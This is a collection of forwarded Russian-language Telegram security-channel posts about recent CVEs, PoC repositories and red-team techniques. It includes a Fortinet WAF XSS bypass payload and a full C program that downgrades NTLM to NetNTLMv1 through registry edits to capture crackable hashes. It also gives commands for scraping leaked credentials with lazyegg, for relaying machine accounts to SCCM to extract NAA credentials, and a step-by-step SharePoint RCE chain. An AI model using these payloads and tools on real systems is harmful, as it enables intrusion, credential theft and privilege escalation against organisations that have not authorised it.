Forwarded from SecuriXy.kz
Для быстрого поиска альясом субиков домена через crt.sh добавляйте альяс в ~/.zshrc
Потом обновите сорсы
Ну и используйте
crtsh() {
if [ -z "$1" ]; then
echo "Usage: crtsh <domain>"
return 1
fi
curl -s "https://crt.sh/?q=$1&output=json" --compressed -H 'User-Agent: Mozilla/5.0' | jq -r '.[].common_name,.[].name_value' | sort -u
}
Потом обновите сорсы
source ~/.zshrcНу и используйте
crtsh DOMAIN.COM
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
PoC for:
— CVE-2024-38094
— CVE-2024-38024
— CVE-2024-38023
🔗 Source:
https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
#sharepoint #poc #rce #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
❤1🔥1
Forwarded from AP Security
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - aydinnyunus/ai-captcha-bypass: AI Captcha Bypass
AI Captcha Bypass. Contribute to aydinnyunus/ai-captcha-bypass development by creating an account on GitHub.
👍1
Forwarded from SecuriXy.kz
#CVE-2024-22274: Privilege Escalation: #VMware #vCenter Server Authenticated #RCE
https://github.com/l0n3m4n/CVE-2024-22274-RCE
https://github.com/l0n3m4n/CVE-2024-22274-RCE
🥱1
Forwarded from Codeby
🗣️ Эта уязвимость позволяет злоумышленнику запускать pipeline jobs от имени другого пользователя, получая доступ к внутренним репозиториям и закрытым проектам.
# For GitLab CE
sudo apt-get update
sudo apt-get install gitlab-ce=17.1.2-ce.0
# For GitLab EE
sudo apt-get update
sudo apt-get install gitlab-ee=17.1.2-ee.0
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
This media is not supported in your browser
VIEW IN TELEGRAM
Еще одна картошка)) Абузит RPCSS в DCOM при обработке OXID
https://github.com/lypd0/DeadPotato
#lpe #potato #ad #pentest #redteam
https://github.com/lypd0/DeadPotato
#lpe #potato #ad #pentest #redteam
🥱1
Forwarded from Похек (Сергей Зыбнев)
Headerpwn 🤯
#security_headers
Представьте, что вы нашли пару критов на проекте, многое хаёв и т.д. Обычный рабочий день в Awillix 🌚
Под конец проекта мы собираем мелкие баги и делаем 100% покрытие скоупа различными ручными и автотестами. Но протыкивать различные заголовки для поиска мисконфигов всегда не очень хочется.
В таком случае я пользуюсь headerpwn. По сути я её нашел когда хотел написать аналогичное на python, но в выдаче google нашел эту репу, что по сути и решило мою проблему.
Установка простейшая:
Использование ни чуть не сложнее:
Формат заголовков в файле
Автор репозитория поделился своим списком заголовков, забрать ТУТ.
Также можете использовать прокси, к примеру для проксирования запросов в BurpSuite или при пивотинге
🧩 Github
🌚 @poxek | 📹 YouTube
#security_headers
Представьте, что вы нашли пару критов на проекте, многое хаёв и т.д. Обычный рабочий день в Awillix 🌚
Под конец проекта мы собираем мелкие баги и делаем 100% покрытие скоупа различными ручными и автотестами. Но протыкивать различные заголовки для поиска мисконфигов всегда не очень хочется.
В таком случае я пользуюсь headerpwn. По сути я её нашел когда хотел написать аналогичное на python, но в выдаче google нашел эту репу, что по сути и решило мою проблему.
Установка простейшая:
go install github.com/devanshbatham/headerpwn@v0.0.3
Использование ни чуть не сложнее:
headerpwn -url https://example.com -headers headers.txt
Формат заголовков в файле
headers.txtProxy-Authenticate: foobar
Proxy-Authentication-Required: foobar
Proxy-Authorization: foobar
Proxy-Connection: foobar
Proxy-Host: foobar
Proxy-Http: foobar
Автор репозитория поделился своим списком заголовков, забрать ТУТ.
Также можете использовать прокси, к примеру для проксирования запросов в BurpSuite или при пивотинге
headerpwn -url https://example.com -headers headers.txt -proxy 127.0.0.1:8080
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Forwarded from Pentester
Leaked Wallpaper
This is a privilege escalation tool (fixed with CVE-2024-38100 in KB5040434) that allows us to leak a user's NetNTLM hash from any session on the computer, even if we are working from a low-privileged user.
https://github.com/MzHmO/LeakedWallpaper
This is a privilege escalation tool (fixed with CVE-2024-38100 in KB5040434) that allows us to leak a user's NetNTLM hash from any session on the computer, even if we are working from a low-privileged user.
https://github.com/MzHmO/LeakedWallpaper
GitHub
GitHub - MzHmO/LeakedWallpaper: Leak of any user's NetNTLM hash. Fixed in KB5040434
Leak of any user's NetNTLM hash. Fixed in KB5040434 - MzHmO/LeakedWallpaper
Forwarded from cKure
■■■■■ WAF Fortinet FortiGate XSS Bypass:
<details open ontoggle="(()=>alert
ibrahimxss)()"></details>Source: https://x.com/ibrahimxss_/status/1819772406988231000X (formerly Twitter)
xss0r (@xss0r) on X
WAF Fortinet FortiGate XSS Bypass:
#Payload:
<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>
#xss #xssbypass #xssWAF #wafbypass #fortinet #fortigate #ibrahimxss #IBRAHIMXSS #xsstool #xsspayloads #payload
#Payload:
<details open ontoggle="(()=>alert`ibrahimxss`)()"></details>
#xss #xssbypass #xssWAF #wafbypass #fortinet #fortigate #ibrahimxss #IBRAHIMXSS #xsstool #xsspayloads #payload
Forwarded from SecuriXy.kz
Снова Apache #OFBiz ERP #RCE #CVE-2024-38856
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
Коренная причина уязвимости кроется в недостатках механизма аутентификации
CVSS score of 9.8 / 10.0.
Она затрагивает Apache OFBiz все версии до 18.12.15.
https://thehackernews.com/2024/08/new-zero-day-flaw-in-apache-ofbiz-erp.html
Big thanks Aman for news
Forwarded from Укротитель змей
RCE через Microsoft SharePoint Server 2019
Microsoft SharePoint — веб-платформа для совместной работы, управления документами и организации совместного доступа к информации в организациях, которая широко используется в корпоративной среде.
Недавно увидел интересные CVE которые затрагивают эту веб-платформу:
CVE-2024-38094
CVE-2024-38024
CVE-2024-38023
Чтобы успешно эксплуатировать RCE, необходимо выполнить несколько условий, а именно
1) Сетевой доступ к уязвимому серверу SharePoint.
2) Учетные данные (лог/пасс) для NTLM аутентификации + учетная запись должна иметь права на создание файлов и папок.
Для успешной эксплуатации уязвимости предоставляется три скрипта: poc_filtered.py, poc_specific.py и poc_sub.py. Сейчас коротко разберем суть и как они работают.
Все три скрипта используют NTLM аутентификацию для доступа к API SharePoint и выполняют схожие действия:
Скрипты сначала аутентифицируются на сервере SharePoint с использованием предоставленных учетных данных. Затем они создают необходимые папки на сервере, такие как BusinessDataMetadataCatalog, отправляя POST-запросы к API SharePoint по пути /api/web/Folders.
Далее создается и загружается файл метаданных BDCMetadata.bdcm, содержащий информацию для выполнения уязвимости. В информации находятся команды для выполнения различных методов SharePoint, таких как GetCreatorView, GetDefaultValues, GetFilters и FindFiltered. Эти методы позволяют взаимодействовать с объектами и данными SharePoint, что в конечном итоге позволяет выполнить произвольный код.
То есть после запуска poc_filtered.py создается новая папка BusinessDataMetadataCatalog, после чего скрипт получает и сохраняет значение X-RequestDigest для дальнейших запросов. X-RequestDigest — это токен, подтверждающий, что запрос исходит от подлинного пользователя. Этот токен включается в заголовки последующих запросов для подтверждения их подлинности. Затем скрипт создает и загружает файл метаданных BDCMetadata.bdcm в созданную папку. Этот файл содержит данные и команды, которые будут использоваться для выполнения уязвимости. В конце, скрипт отправляет специально сформированный XML-запрос к API SharePoint для выполнения уязвимых методов, что позволяет выполнить произвольный код на сервере.
Но между скриптами есть небольшая разница, а именно в используемых методах.
1) poc_filtered.py использует метод FindFiltered для взаимодействия с объектами SharePoint.
2) poc_specific.py использует метод FindSpecific для выполнения конкретных задач и команд.
3) poc_sub.py в этом скрипте используется метод Subscribe для подписки на события или действия.
PoC
PoC Video
Microsoft SharePoint — веб-платформа для совместной работы, управления документами и организации совместного доступа к информации в организациях, которая широко используется в корпоративной среде.
Недавно увидел интересные CVE которые затрагивают эту веб-платформу:
CVE-2024-38094
CVE-2024-38024
CVE-2024-38023
Чтобы успешно эксплуатировать RCE, необходимо выполнить несколько условий, а именно
1) Сетевой доступ к уязвимому серверу SharePoint.
2) Учетные данные (лог/пасс) для NTLM аутентификации + учетная запись должна иметь права на создание файлов и папок.
Для успешной эксплуатации уязвимости предоставляется три скрипта: poc_filtered.py, poc_specific.py и poc_sub.py. Сейчас коротко разберем суть и как они работают.
Все три скрипта используют NTLM аутентификацию для доступа к API SharePoint и выполняют схожие действия:
Скрипты сначала аутентифицируются на сервере SharePoint с использованием предоставленных учетных данных. Затем они создают необходимые папки на сервере, такие как BusinessDataMetadataCatalog, отправляя POST-запросы к API SharePoint по пути /api/web/Folders.
Далее создается и загружается файл метаданных BDCMetadata.bdcm, содержащий информацию для выполнения уязвимости. В информации находятся команды для выполнения различных методов SharePoint, таких как GetCreatorView, GetDefaultValues, GetFilters и FindFiltered. Эти методы позволяют взаимодействовать с объектами и данными SharePoint, что в конечном итоге позволяет выполнить произвольный код.
То есть после запуска poc_filtered.py создается новая папка BusinessDataMetadataCatalog, после чего скрипт получает и сохраняет значение X-RequestDigest для дальнейших запросов. X-RequestDigest — это токен, подтверждающий, что запрос исходит от подлинного пользователя. Этот токен включается в заголовки последующих запросов для подтверждения их подлинности. Затем скрипт создает и загружает файл метаданных BDCMetadata.bdcm в созданную папку. Этот файл содержит данные и команды, которые будут использоваться для выполнения уязвимости. В конце, скрипт отправляет специально сформированный XML-запрос к API SharePoint для выполнения уязвимых методов, что позволяет выполнить произвольный код на сервере.
Но между скриптами есть небольшая разница, а именно в используемых методах.
1) poc_filtered.py использует метод FindFiltered для взаимодействия с объектами SharePoint.
2) poc_specific.py использует метод FindSpecific для выполнения конкретных задач и команд.
3) poc_sub.py в этом скрипте используется метод Subscribe для подписки на события или действия.
PoC
PoC Video
🔥1
Forwarded from Machete Hack
This media is not supported in your browser
VIEW IN TELEGRAM
Недавно на github'е наткнулся на интересную утилиту LazyEgg, позволяющую добывать ссылки, фото, URL'ы, айпишники, креды, ключи по целевому URL, а также искать и анализировать js файлы по сигнатурам
https://github.com/schooldropout1337/lazyegg
git clone https://github.com/schooldropout1337/lazyegg.git
python lazyegg.py http://localhost:8080
python lazyegg.py http://localhost:8080/js --js_scan --w wordlist.txt
cat jsurls.txt | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg.py "{}" --js_urls --domains --ips --leaked_creds'waybackurls vulnweb.com | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'python lazyegg.py "{}" --js_urls --domains --ips' > jsurls.log && cat jsurls.log | grep '\.' | sort -ule-jsurl.zip репозиторияPlease open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Pavel Shlundin)
Совсем недавно Миша выложил инструмент LeakedWallpaper, а я уже успел применить его на проекте. Все отработало отлично! Но зачем нам нужен NetNTLMv2 хеш? Давайте подумаем, как можно улучшить технику, если на компе злющий EDR, но зато есть права local admin. С правами local admin вы можете с помощью манипуляции ключами реестра сделать downgrade NTLM аутентификации до NetNTLMv1 и получить уже хеш, который можно восстановить в NTLM хеш в независимости от сложности пароля пользователя. Для этой цели я написал небольшую программу, которая бэкапит текущие настройки реестра, затем делает downgrade и через 60 сек восстанавливает все обратно.
Компилируем так
В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.
#include <stdio.h>
#include <windows.h>
#include <winreg.h>
#include <stdint.h>
#include <unistd.h> // для функции sleep
void GetRegKey(const char* path, const char* key, DWORD* oldValue) {
HKEY hKey;
DWORD value;
DWORD valueSize = sizeof(DWORD);
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_READ, &hKey) == ERROR_SUCCESS) {
RegQueryValueEx(hKey, key, NULL, NULL, (LPBYTE)&value, &valueSize);
RegCloseKey(hKey);
*oldValue = value;
} else {
printf("Ошибка чтения ключа реестра.\n");
}
}
void SetRegKey(const char* path, const char* key, DWORD newValue) {
HKEY hKey;
if (RegOpenKeyEx(HKEY_LOCAL_MACHINE, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS) {
RegSetValueEx(hKey, key, 0, REG_DWORD, (const BYTE*)&newValue, sizeof(DWORD));
RegCloseKey(hKey);
} else {
printf("Ошибка записи ключа реестра.\n");
}
}
void ExtendedNTLMDowngrade(DWORD* oldValue_LMCompatibilityLevel, DWORD* oldValue_NtlmMinClientSec, DWORD* oldValue_RestrictSendingNTLMTraffic) {
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", 2);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", 536870912);
GetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", 0);
}
void NTLMRestore(DWORD oldValue_LMCompatibilityLevel, DWORD oldValue_NtlmMinClientSec, DWORD oldValue_RestrictSendingNTLMTraffic) {
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa", "LMCompatibilityLevel", oldValue_LMCompatibilityLevel);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "NtlmMinClientSec", oldValue_NtlmMinClientSec);
SetRegKey("SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0", "RestrictSendingNTLMTraffic", oldValue_RestrictSendingNTLMTraffic);
}
int main() {
DWORD oldValue_LMCompatibilityLevel = 0;
DWORD oldValue_NtlmMinClientSec = 0;
DWORD oldValue_RestrictSendingNTLMTraffic = 0;
ExtendedNTLMDowngrade(&oldValue_LMCompatibilityLevel, &oldValue_NtlmMinClientSec, &oldValue_RestrictSendingNTLMTraffic);
// Задержка 60 секунд
sleep(60);
NTLMRestore(oldValue_LMCompatibilityLevel, oldValue_NtlmMinClientSec, oldValue_RestrictSendingNTLMTraffic);
return 0;
}
Компилируем так
x86_64-w64-mingw32-gcc -o ntlm.exe ntlm.c
В итоге мне удалось получить NetNTLMv1 хеш небрутабельного пароля привилегированной УЗ и восстановить NTLM хеш в течении 10 часов. Profit!
Ну или для совсем ленивых добавили флаг -downgrade прямо в инструмент LeakedWallpaper :)
P.S. Не забывайте добавлять привилегированные УЗ в Protected Users.
Forwarded from SecuriXy.kz
#CVE-2024-22116 Critical RCE в Zabbix Monitoring Solution
An administrator with restricted permissions can exploit the lack of default escaping for script parameters.
CVSS 9.9
The vulnerability affects the following versions of Zabbix:
6.4.0 to 6.4.15
7.0.0alpha1 to 7.0.0rc2
Zabbix has addressed this issue in the following fixed versions:
6.4.16rc1
7.0.0rc3
https://support.zabbix.com/browse/ZBX-25016
An administrator with restricted permissions can exploit the lack of default escaping for script parameters.
CVSS 9.9
The vulnerability affects the following versions of Zabbix:
6.4.0 to 6.4.15
7.0.0alpha1 to 7.0.0rc2
Zabbix has addressed this issue in the following fixed versions:
6.4.16rc1
7.0.0rc3
https://support.zabbix.com/browse/ZBX-25016
Forwarded from Proxy Bar
CVE-2022-24834 Redis
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC
#redis #rce
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC
#redis #rce
🥱2
Пс, там известная шпаргалка "TheHackerRecipes" переехала на собственный сайт.
This project is aimed at providing technical guides on various hacking topics. The most advanced topics are Active Directory and Web services.
https://www.thehacker.recipes/
This project is aimed at providing technical guides on various hacking topics. The most advanced topics are Active Directory and Web services.
https://www.thehacker.recipes/
www.thehacker.recipes
The Hacker Recipes
Comprehensive cybersecurity guides and strategies for ethical hacking and penetration testing
Please open Telegram to view this post
VIEW IN TELEGRAM
😍3🎉1😘1😡1
Forwarded from RedTeam brazzers (Миша)
Продолжим тему интересных вопросов с собесов, которые когда-то не вошли в подкаст :)) Думаю, все знают про MachineAccountQuota — количество компьютерных УЗ, которые могут добавлять пользователи в домен. Дефолтное значение 10. Однако, как этим злоупотреблять? В основном все вспоминают следующие основные кейсы:
- NTLM Relay / иной функционал абуза , для эксплуатации которого требуется компьютерная учетная запись, например, настройка RBCD
- Небезопасные ACL компьютерных учетных записей домена
Впрочем, есть еще один интересный вектор, который связан с SCCM и NAA (Network Access Accounts). Это специальные аккаунты, которые предоставляются SCCMом для того, чтобы клиент мог получить доступ к Distribution Point для загрузки необходимых файлов. Учетные данные от NAA в большинстве своем пушатся абсолютно на все компьютеры, управляемые SCCMом.
Если вдруг у передаваемой учетки недостаточно порезаны права, то у нас появляется вектор повышения привилегий :)
Итак, кейс первый. MAQ > 0 (или мы хакнули компьютерную УЗ). В таком случае берем инструмент sccmhunter и запускаем его следующим образом:
Ключ
Однако, что если MAQ = 0? В таком случае мы можем осуществить ретрансляцию существующих кред любой машинной УЗ на SCCM и извлечь NAA-креды. Для этого берем форк , запускаем:
Далее триггерим любым удобным способом любой компьютер. ntlmrelayx сдампит для нас любезно файл
- NTLM Relay / иной функционал абуза , для эксплуатации которого требуется компьютерная учетная запись, например, настройка RBCD
- Небезопасные ACL компьютерных учетных записей домена
Впрочем, есть еще один интересный вектор, который связан с SCCM и NAA (Network Access Accounts). Это специальные аккаунты, которые предоставляются SCCMом для того, чтобы клиент мог получить доступ к Distribution Point для загрузки необходимых файлов. Учетные данные от NAA в большинстве своем пушатся абсолютно на все компьютеры, управляемые SCCMом.
Если вдруг у передаваемой учетки недостаточно порезаны права, то у нас появляется вектор повышения привилегий :)
Итак, кейс первый. MAQ > 0 (или мы хакнули компьютерную УЗ). В таком случае берем инструмент sccmhunter и запускаем его следующим образом:
python sccmhunter.py http -auto -u pentest -p lolkekcheb123! -d abc.ru -dc-ip 192.168.0.1
Ключ
-auto автоматически создаст УЗ. Можно указать уже существующую через -cp , -cn.Однако, что если MAQ = 0? В таком случае мы можем осуществить ретрансляцию существующих кред любой машинной УЗ на SCCM и извлечь NAA-креды. Для этого берем форк , запускаем:
python3 ntlmrelayx.py -t http://sccm.sccmlab.local/ccm_system_windowsauth/request --sccm --sccm-device test12345 --sccm-fqdn sccm.sccmlab.local --sccm-sleep 10 -smb2support
-t <- Site Server, на который релеим—sccm-device <- произвольное имя, которое появится в админке SCCM. Это имя как бы добавляемого устройства—sccm-sleep <- таймаут, в течение которого ждать получения политикиДалее триггерим любым удобным способом любой компьютер. ntlmrelayx сдампит для нас любезно файл
naapolicy.xml с учетными данными от NAA-аккаунта, которые можно расшифровать так, как показано в блоге.